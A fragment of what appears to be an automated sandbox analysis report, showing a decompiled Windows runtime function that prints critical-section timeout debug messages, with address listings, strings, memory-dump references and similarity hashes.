				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E048ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E048F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E048F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                        0x048ffdda
                                                                        0x048ffde2
                                                                        0x048ffde5
                                                                        0x048ffdec
                                                                        0x048ffdfa
                                                                        0x048ffdff
                                                                        0x048ffe0a
                                                                        0x048ffe0f
                                                                        0x048ffe17
                                                                        0x048ffe1e
                                                                        0x048ffe19
                                                                        0x048ffe19
                                                                        0x048ffe19
                                                                        0x048ffe20
                                                                        0x048ffe21
                                                                        0x048ffe22
                                                                        0x048ffe25
                                                                        0x048ffe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048FFDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048FFE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048FFE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: e720798892b94897e7df4a037a0d6817c4a6365fc405b74644dfdefed477656b
                                                                        • Instruction ID: fa3096ad616900e4404a3f20a1ebabfe47189147e5b558c65d43146db1be5e67
                                                                        • Opcode Fuzzy Hash: e720798892b94897e7df4a037a0d6817c4a6365fc405b74644dfdefed477656b
                                                                        • Instruction Fuzzy Hash: 68F0FC32640501BFE6201A45DC01F237F5ADB44730F140715F714955E1EAA2F8309AF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%